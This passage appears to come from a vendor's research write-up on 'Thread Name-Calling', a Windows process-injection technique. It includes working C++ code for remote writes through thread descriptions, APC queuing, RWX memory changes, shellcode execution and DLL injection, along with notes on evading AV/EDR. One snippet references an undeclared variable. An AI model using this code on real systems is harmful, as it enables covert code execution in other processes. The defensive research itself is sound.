   +0x340 SpareUlongs      : [5] Uint4B
   [...]

The PEB has read/write access, so by finding an unused field of pointer size, we have suitable storage where the remotely called function can write back. Keep in mind that in future versions of Windows those fields may be used for system data structures, so this solution must be adjusted as Windows is updated.

First, we retrieve the address of the remote PEB. We can do it by calling the API NtQueryInformationProcess:

// the function getting the remote PEB address:
ULONG_PTR remote_peb_addr(IN HANDLE hProcess)
{
    PROCESS_BASIC_INFORMATION pi = { 0 };
    DWORD ReturnLength = 0;

    auto pNtQueryInformationProcess = reinterpret_cast<decltype(&NtQueryInformationProcess)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess"));
    if (!pNtQueryInformationProcess) {
        return NULL;
    }
    NTSTATUS status = pNtQueryInformationProcess(
        hProcess,
        ProcessBasicInformation,
        &pi,
        sizeof(PROCESS_BASIC_INFORMATION),
        &ReturnLength
    );
    if (status != STATUS_SUCCESS) {
        std::cerr << "NtQueryInformationProcess failed" << std::endl;
        return NULL;
    }
    return (ULONG_PTR)pi.PebBaseAddress;
}

Having the base address of the PEB, it is enough to add the known offset of the unused field, to get its pointer in the context of the remote process:

ULONG_PTR get_peb_unused(HANDLE hProcess)
{
    ULONG_PTR peb_addr = remote_peb_addr(hProcess);
    if (!peb_addr) {
        std::cerr << "Cannot retrieve PEB address!\n";
        return NULL;
    }
    const ULONG_PTR UNUSED_OFFSET = 0x340;
    const ULONG_PTR remotePtr = peb_addr + UNUSED_OFFSET;
    return remotePtr;
}

As for setting the thread description (a.k.a. name), we can do it either:

  1. on an existing thread
  2. on a new one, that we just create for this purpose

The name will be retrieved by passing an APC with the function GetThreadDescription to the same thread where it was set (since this function has 2 parameters, and calling via APC we can pass up to 3 parameters, it is a good fit).

Side note:

The function GetThreadDescription requires us to pass a handle to the thread whose description (name) we want to read. We can set the name on a different thread than the one reading it back, but keep in mind that this function will be executed in the context of the target process. Therefore, the thread handle that we opened in the context of the injector process is not valid there. Using it in the context of a different process would require us to duplicate the handle of the named thread, which means extending our access to the target process with PROCESS_DUP_HANDLE, so it is best avoided. The alternative scenario is much easier: because the name is retrieved by the named thread itself, it is enough to use the pseudo handle NtCurrentThread() = (-2), which is always valid when a thread refers to itself.

In the first (preferable) scenario, if we utilize the threads already running within the process, we should either:

  • use the new API for APC, and add our function as the Special User APC (QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC)
  • find a thread in an alertable state, so that our function can be called when the thread gets alerted

The thread must be opened with (at least) THREAD_SET_CONTEXT | THREAD_SET_LIMITED_INFORMATION access.

In the second scenario, with a newly created thread, if we use it in conjunction with the old API, we also have to ensure that the thread is alertable, so that our APC gets executed. Examples on how to do it:

Any other steps can be done only after our APC gets called. Before that, we don’t have our buffer in the remote process yet, and we also don’t know at what address it would be stored. Therefore, in order to pass the buffer, we need the first APC. And after it is completed and the buffer is written, we need the second APC to be able to run it.

wchar_t* pass_via_thread_name(HANDLE hProcess, const wchar_t* buf, const void* remotePtr)
{
    if (!remotePtr) {
        std::cerr << "Return pointer not set!\n";
        return nullptr;
    }

    HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT | THREAD_SET_LIMITED_INFORMATION);

    if (!hThread || hThread == INVALID_HANDLE_VALUE) {
        std::cerr << "Invalid thread handle!\n";
        return nullptr;
    }

    HRESULT hr = mySetThreadDescription(hThread, buf); // customized SetThreadDescription allows to pass a buffer with NULL bytes
    if (FAILED(hr)) {
        std::cout << "Failed to set thread desc" << std::endl;
        CloseHandle(hThread); // release the thread handle on this failure path as well
        return nullptr;
    }
    if (!queue_apc_thread(hThread, GetThreadDescription, (void*)NtCurrentThread(), (void*)remotePtr, 0)) {
        CloseHandle(hThread);
        return nullptr;
    }
    // close thread handle
    CloseHandle(hThread);

    wchar_t* wPtr = nullptr;
    bool isRead = false;
    while ((wPtr = (wchar_t*)read_remote_ptr(hProcess, remotePtr, isRead)) == nullptr) {
        if (!isRead) return nullptr;
        Sleep(1000); // waiting for the pointer to be written;
    }
    std::cout << "Written to the Thread\n";
    return wPtr;
}

After the above function finishes, we have our buffer written to the remote process. We also have a pointer to it. That means, the remote write is accomplished.
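The wait loop in the function above polls until the pointer slot becomes non-null, with no upper bound on the number of attempts. As a generic illustration of that polling pattern with a bounded retry count, here is a small portable sketch. `PollResult`, `poll_until_set` and the `read_slot` callback are hypothetical names that do not appear in the original code; the callback stands in for whatever routine reads the slot.

```cpp
#include <chrono>
#include <cstdint>
#include <functional>
#include <thread>

enum class PollResult { Ready, ReadFailed, TimedOut };

// Polls `read_slot` until it reports a non-zero value, the read itself fails,
// or `max_attempts` reads have been made. `read_slot` is a hypothetical
// callback: it returns false if the read failed, otherwise it stores the
// current slot content in its argument (0 meaning "not written yet").
inline PollResult poll_until_set(
    const std::function<bool(std::uintptr_t&)>& read_slot,
    unsigned max_attempts,
    std::chrono::milliseconds delay,
    std::uintptr_t& out)
{
    for (unsigned attempt = 0; attempt < max_attempts; ++attempt) {
        std::uintptr_t value = 0;
        if (!read_slot(value)) {
            return PollResult::ReadFailed;
        }
        if (value != 0) {
            out = value;
            return PollResult::Ready;
        }
        // Sleep only if another attempt will follow.
        if (attempt + 1 < max_attempts) {
            std::this_thread::sleep_for(delay);
        }
    }
    return PollResult::TimedOut;
}
```

Separating the "read failed" and "timed out" outcomes lets the caller tell a dead target apart from a callback that was never dispatched. With the classic APC type, the latter happens when the chosen thread never enters an alertable wait.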

Figure 2 – Remote write with the help of Thread Name

At this point our payload is already stored in the working set of the remote process. However, it is in a non-executable memory, allocated on the heap.

To proceed, we need to do one of these:

  • find an empty cave in executable memory, and copy it there (the most stealthy option; unfortunately, finding a fitting cave is unlikely in practice)
  • allocate a new, executable buffer of a fitting size, and copy it there
  • set Read-Write-eXecute (RWX) access rights on the whole page containing it (we cannot just make it RX: remember that it is a page used for the heap, and there is some other data stored along with our buffer)
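The last option works at page granularity: a protection change covers every page that the given range touches, not only the bytes of the buffer. The sketch below only illustrates that arithmetic. `PageSpan` and `pages_touched` are hypothetical names, and the 4 KiB page size is an assumption that matches common x86/x64 configurations.

```cpp
#include <cstddef>
#include <cstdint>

// Assumption: 4 KiB pages, as on typical x86/x64 Windows configurations.
constexpr std::uintptr_t kPageSize = 0x1000;

struct PageSpan {
    std::uintptr_t first_page; // base address of the first affected page
    std::size_t    page_count; // number of pages whose protection changes
};

// Computes which pages are covered by the byte range [addr, addr + len).
inline PageSpan pages_touched(std::uintptr_t addr, std::size_t len)
{
    const std::uintptr_t mask  = ~(kPageSize - 1);
    const std::uintptr_t first = addr & mask;
    if (len == 0) {
        return PageSpan{ first, 0 };
    }
    const std::uintptr_t last = (addr + len - 1) & mask;
    return PageSpan{ first, static_cast<std::size_t>((last - first) / kPageSize) + 1 };
}
```

For instance, a 0x20-byte buffer starting at 0x10FF0 straddles a page boundary, so two full pages (0x2000 bytes of heap) would have their protection changed. Defenders can use this as an indicator, since executable heap pages are unusual in most applications.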

Copying our buffer from the heap into a different memory region can be achieved via APC, by calling the function RtlMoveMemory from ntdll, which has 3 arguments. However, obtaining the executable buffer is more problematic.

None of the proposed solutions is perfect, but they may be sufficient depending on the scenario.

Allocating a new buffer is the cleanest option, but it has some drawbacks. To do it from a remote process, we must call VirtualAllocEx with RWX access – which is suspicious. Calling VirtualAlloc remotely via APC is impossible: this function has 4 arguments, and with the API for APC we can only pass 3.

An alternative is to use the buffer that we already have (allocated on the heap), and just change its memory protection. We can do it by calling VirtualProtectEx. Changing the memory protection of a page within the remote process is still suspicious, but the advantage of this method is that it requires fewer steps than the one presented earlier. Again, remotely calling the local equivalent of this function, VirtualProtect, has the same problem as calling VirtualAlloc: it takes four arguments.

Still, there exists a possibility to do the memory protection or allocation by calling VirtualAlloc/VirtualProtect remotely with the help of ROP (included as one of the options in our PoC code). But this method comes with its own problems, and a different set of suspicious indicators. It requires using API for direct thread manipulation (SuspendThread/ResumeThread, SetThreadContext/GetThreadContext). According to the tests we performed, that raises even more alerts, and will result in our injector being flagged by many AV/EDR products. In addition, allocating executable memory from within the process will fail if it has the DCP (Dynamic Code Prohibited) enabled.

After considering all the pros and cons, we decided to keep things simple and just call VirtualProtectEx. The second snippet illustrates the alternative version, with VirtualAllocEx.

Once our shellcode is in the executable memory region, we are ready to run it. We use another APC to trigger the execution (this requires a thread handle with THREAD_SET_CONTEXT access). Additionally, we may use the aforementioned function, RtlDispatchAPC, as a proxy to call the injected code.

Snippet illustrating the basic implementation:

bool run_injected_v1(HANDLE hProcess, void* remotePtr, size_t payload_len)
{
    DWORD oldProtect = 0;
    if (!VirtualProtectEx(hProcess, remotePtr, payload_len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        std::cout << "Failed to protect!" << std::hex << GetLastError() << "\n";
        return false;
    }
    HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT);
    if (!hThread || hThread == INVALID_HANDLE_VALUE) {
        std::cerr << "Invalid thread handle!\n";
        return false;
    }
    bool isOk = false;
    auto _RtlDispatchAPC = GetProcAddress(GetModuleHandle("ntdll.dll"), MAKEINTRESOURCE(8)); //RtlDispatchAPC;
    if (_RtlDispatchAPC) {
        if (queue_apc_thread(hThread, _RtlDispatchAPC, shellcodePtr, 0, (void*)(-1))) {
            isOk = true;
        }
    }
    CloseHandle(hThread);
    return isOk;
}

Extended version, covering different possibilities:

bool run_injected(HANDLE hProcess, void* remotePtr, size_t payload_len)
{
    void* shellcodePtr = remotePtr;
    // Either reuse a thread of the target or create a new alertable one.
#ifdef USE_EXISTING_THREAD
    HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT);
#else
    HANDLE hThread = create_alertable_thread(hProcess);
#endif
    if (!hThread || hThread == INVALID_HANDLE_VALUE) {
        std::cerr << "Invalid thread handle!\n";
        return false;
    }
#ifdef USE_NEW_BUFFER
    // Variant 1: allocate a new executable buffer and let the target copy the payload into it via an APC.
    shellcodePtr = VirtualAllocEx(hProcess, nullptr, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!shellcodePtr) {
        std::cerr << "Failed to allocate: " << std::hex << GetLastError() << "\n";
        CloseHandle(hThread);
        return false;
    }
    std::cout << "Allocated: " << std::hex << shellcodePtr << "\n";
    void* _RtlMoveMemoryPtr = GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlMoveMemory");
    if (!_RtlMoveMemoryPtr) {
        std::cerr << "Failed retrieving: _RtlMoveMemoryPtr\n";
        CloseHandle(hThread);
        return false;
    }
    if (!queue_apc_thread(hThread, _RtlMoveMemoryPtr, shellcodePtr, remotePtr, (void*)payload_len)) {
        CloseHandle(hThread);
        return false;
    }
    std::cout << "Added RtlMoveMemory to the thread queue!\n";
#else
    // Variant 2: change the protection of the buffer that already holds the payload.
    DWORD oldProtect = 0;
    if (!VirtualProtectEx(hProcess, shellcodePtr, payload_len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        std::cerr << "Failed to protect: " << std::hex << GetLastError() << "\n";
        CloseHandle(hThread);
        return false;
    }
    std::cout << "Protection changed! Old: " << std::hex << oldProtect << "\n";
#endif
    bool isOk = false;
    // Prefer RtlDispatchAPC (resolved by ordinal 8) as a proxy; otherwise call the shellcode directly.
    auto _RtlDispatchAPC = GetProcAddress(GetModuleHandleA("ntdll.dll"), MAKEINTRESOURCEA(8));
    if (_RtlDispatchAPC) {
        std::cout << "Using RtlDispatchAPC\n";
        if (queue_apc_thread(hThread, _RtlDispatchAPC, shellcodePtr, 0, (void*)(-1))) {
            isOk = true;
        }
    }
    else {
        if (queue_apc_thread(hThread, shellcodePtr, 0, 0, 0)) {
            isOk = true;
        }
    }
    if (isOk) std::cout << "Added to the thread queue!\n";
#ifndef USE_EXISTING_THREAD
    // The new thread was created suspended; resume it so the queued APCs run.
    ResumeThread(hThread);
#endif
    CloseHandle(hThread);
    return isOk;
}

And it works!

See in action

Video demo: https://youtu.be/1BJaxHh91p4

Figure 3 – Demo of the Thread Name-Calling: the code injected into mspaint.exe executed a new process: calc.exe

As we found during our tests, although we call a potentially suspicious API (VirtualProtectEx or VirtualAllocEx), for most of the products this indicator alone was not enough to flag the payload: they did not register that we were using an injected buffer.

Known limitations and room for improvement

During our research, we assessed several different methods of making the injected buffer executable. Unfortunately, each of them has its flaws. The most straightforward way is to use an API that operates on the process, such as VirtualProtectEx or VirtualAllocEx. However, using those functions may draw unwanted attention. The alternative is to call VirtualProtect or VirtualAlloc remotely, via ROP. However, this involves a set of APIs that are even more suspicious, so we decided to stick with the simpler alternative.

The presence of a page with RWX access rights is another indicator that memory scanners will quickly pick up. With just a few more calls, we can easily implement a scenario where we allocate a new memory region with Read/Write access, copy the injected buffer there, and then change the protection to Read/eXecute. Also, once our code is executing within the context of the remote process, nothing stops us from pivoting further: allocating additional memory within it (as long as the process does not use the DCP, i.e. Dynamic Code Prohibited, policy), moving the payload, and changing the access rights back to the initial ones.
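
On the detection side, the RWX indicator mentioned above comes down to a check on the page protection value. The following is a minimal, portable sketch rather than a real memory scanner: the constants mirror the documented Windows memory protection values, redefined locally so that the snippet compiles without windows.h, and the helper name is_write_and_execute is hypothetical.

```cpp
#include <cstdint>

// Values of the documented Windows memory protection constants.
// Assumption: redefined locally so the sketch builds on any platform.
constexpr std::uint32_t kPageReadWrite        = 0x04; // PAGE_READWRITE
constexpr std::uint32_t kPageExecuteRead      = 0x20; // PAGE_EXECUTE_READ
constexpr std::uint32_t kPageExecuteReadWrite = 0x40; // PAGE_EXECUTE_READWRITE
constexpr std::uint32_t kPageExecuteWriteCopy = 0x80; // PAGE_EXECUTE_WRITECOPY

// Hypothetical helper: true when a protection value grants both write and
// execute access. The low byte holds the base protection; modifiers such as
// PAGE_GUARD (0x100) live in higher bits and are ignored here.
constexpr bool is_write_and_execute(std::uint32_t protect)
{
    return (protect & 0xFF) == kPageExecuteReadWrite
        || (protect & 0xFF) == kPageExecuteWriteCopy;
}

static_assert(is_write_and_execute(kPageExecuteReadWrite), "RWX is flagged");
static_assert(!is_write_and_execute(kPageReadWrite), "RW alone is not flagged");
static_assert(!is_write_and_execute(kPageExecuteRead), "RX alone is not flagged");
```

A region that is first Read/Write and later Read/eXecute never passes through a state flagged by this check, which is why the staged scenario described above is harder to spot with a point-in-time scan of page protections.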

If needed, we can also further reduce access rights with which the process has to be opened, as described at the beginning of the chapter.

Bonus: DLL injection using Thread Name

DLL injection is one of the well-known techniques for augmenting a running process with our code. It is not a particularly stealthy technique, because it calls LoadLibrary on the payload (a DLL), which first has to be dropped on the disk. In addition, the mere fact of loading a PE via the standard API generates a kernel callback that can be used for detection. Nevertheless, it is a simple technique that can be useful in some cases, and it is worthwhile to have it in our arsenal.

Typical implementation of DLL injection involves:

  1. VirtualAllocEx – to allocate memory for a DLL path within the remote process
  2. WriteProcessMemory – to write the path into the allocated memory
  3. CreateRemoteThread (or equivalents) – to call LoadLibrary remotely (passing it the pointer to the written path). Some variants may involve running LoadLibrary via an APC instead of a new thread.

In this section, we propose an alternative implementation that does not require write access to the target process and involves non-standard APIs:

  1. SetThreadDescription + NtQueueApcThreadEx2 with GetThreadDescription – for remote memory allocation + writing the path to the remote process
  2. NtQueueApcThreadEx2 – to call LoadLibrary remotely (but of course we can also use a new thread, like in the classic implementation)

The first step can be implemented exactly as in Thread Name-Calling (described under “Remote write with the help of thread description”). Snippet:

    const wchar_t* buf = dllName.c_str();
    void* remotePtr = get_peb_unused(hProcess);
    wchar_t* wPtr = pass_via_thread_name(hProcess, buf, remotePtr);

In contrast to Thread Name-Calling, we don’t have to change the access rights to our injected buffer, so the second step is very simple.

bool inject_with_loadlibrary(HANDLE hProcess, PVOID remote_ptr)
{
    HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT);
    if (!hThread || hThread == INVALID_HANDLE_VALUE) {
        std::cerr << "Invalid thread handle!\n";
        return false;
    }
    // Queue LoadLibraryW as the APC routine; remote_ptr points to the DLL path written in the first step.
    bool isOk = queue_apc_thread(hThread, LoadLibraryW, remote_ptr, 0, 0);
    CloseHandle(hThread);
    return isOk;
}

See in action

Video demo: https://youtu.be/8cSNgE3gZxY

The tested targets

The described techniques were tested on Windows 10 and Windows 11. List of the tested versions:

Version 10.0.19045 Build 19045 (Windows 10 Enterprise, 64 bit)
Version 10.0.22621 Build 22000 (Windows 11 Pro, 64 bit)
Version 10.0.22621 Build 22621 (Windows 11 Pro, 64 bit - Windows 11 v22H2)
Version 10.0.22631 Build 22631 (Windows 11 Pro, 64 bit - Windows 11 v23H2)

The intended target is a 64-bit process. The following mitigation policies may be set:

  DWORD64 MitgFlags = PROCESS_CREATION_MITIGATION_POLICY_CONTROL_FLOW_GUARD_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY_PROHIBIT_DYNAMIC_CODE_ALWAYS_ON // won't work with the version calling VirtualProtect/VirtualAlloc via ROP
        | PROCESS_CREATION_MITIGATION_POLICY_HEAP_TERMINATE_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY_BOTTOM_UP_ASLR_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY_HIGH_ENTROPY_ASLR_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY_STRICT_HANDLE_CHECKS_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY_EXTENSION_POINT_DISABLE_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY_IMAGE_LOAD_NO_REMOTE_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY2_MODULE_TAMPERING_PROTECTION_ALWAYS_ON
        ;

Thread Name-Calling won’t work on processes that have the following mitigation policy set:

PROCESS_CREATION_MITIGATION_POLICY_WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON

Source code

The complete source code, containing the implementation of the described techniques, can be found in the following repository:

https://github.com/hasherezade/thread_namecalling

Conclusions

As new APIs are added to Windows, new ideas for injection techniques keep appearing. To implement effective detection, we must always keep an eye on the changing landscape. Fortunately, Microsoft is also working on giving anti-malware products more visibility, and currently most of the important APIs can be monitored with the help of ETW events.

Thread Name-Calling uses some relatively new APIs. However, it cannot avoid incorporating older, well-known components, such as APC injection, whose APIs should always be treated as a potential threat. Similarly, the manipulation of access rights within a remote process is a suspicious activity. However, even those indicators, when used outside the typical sequence of calls, may be overlooked by some AV and EDR products.
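
The last point suggests that detection logic should not depend on indicators arriving in the textbook order. As a rough sketch of that idea (not a description of any product's logic), the snippet below collects the indicators observed for a given pair of source and target processes and raises a flag once all of them have been seen, regardless of their order. The Indicator labels and the IndicatorTracker class are hypothetical names chosen for illustration.

```cpp
#include <bitset>
#include <cstddef>
#include <cstdint>
#include <map>
#include <utility>

// Hypothetical indicator labels, loosely following the steps of Thread Name-Calling.
enum class Indicator : std::size_t {
    RemoteThreadDescriptionSet = 0, // description set on a thread of another process
    RemoteApcQueued,                // APC queued to a thread of another process
    RemoteProtectionChanged,        // memory protected or allocated in another process
    Count
};

class IndicatorTracker {
public:
    // Records one observation. Returns true once every indicator has been
    // seen for this (source pid, target pid) pair, in any order.
    bool observe(std::uint32_t sourcePid, std::uint32_t targetPid, Indicator what)
    {
        auto& seen = seen_[std::make_pair(sourcePid, targetPid)];
        seen.set(static_cast<std::size_t>(what));
        return seen.all();
    }

private:
    using Mask = std::bitset<static_cast<std::size_t>(Indicator::Count)>;
    std::map<std::pair<std::uint32_t, std::uint32_t>, Mask> seen_;
};
```

In practice, the observations would come from a telemetry source such as the ETW events mentioned above. A usable implementation would also need time windows and allow-listing of legitimate software, which this sketch leaves out.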

Check Point customers remain protected from the threats described in this research.

Check Point’s Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems, and has developed and deployed a signature to detect and protect customers against the threats described in this research.

Check Point’s Harmony Endpoint provides comprehensive endpoint protection at the highest security level, crucial to avoid security breaches and data compromise. Behavioral Guard protections were developed and deployed to protect customers against the threats described in this research.

TE/Harmony Endpoint protections:

Behavioral.Win.ImageModification.C

Behavioral.Win.ImageModification.F

References

https://attack.mitre.org/techniques/T1055

https://i.blackhat.com/USA-19/Thursday/us-19-Kotler-Process-Injection-Techniques-Gotta-Catch-Them-All-wp.pdf

https://twitter.com/Hexacorn/status/1317424213951733761

https://twitter.com/_Gal_Yaniv/status/1353630677493837825

https://blahcat.github.io/posts/2019/03/17/small-dumps-in-the-big-pool.html

https://www.unknowncheats.me/forum/general-programming-and-reversing/596888-communicating-thread-name.html

https://gitlab.com/ORCA000/t.d.p

https://www.lodsb.com/shellcode-injection-using-threadnameinformation

https://modexp.wordpress.com/2019/08/27/process-injection-apc/

https://repnz.github.io/posts/apc/user-apc/#ntqueueapcthreadex-meet-special-user-apc

https://www.deepinstinct.com/blog/inject-me-x64-injection-less-code-injection
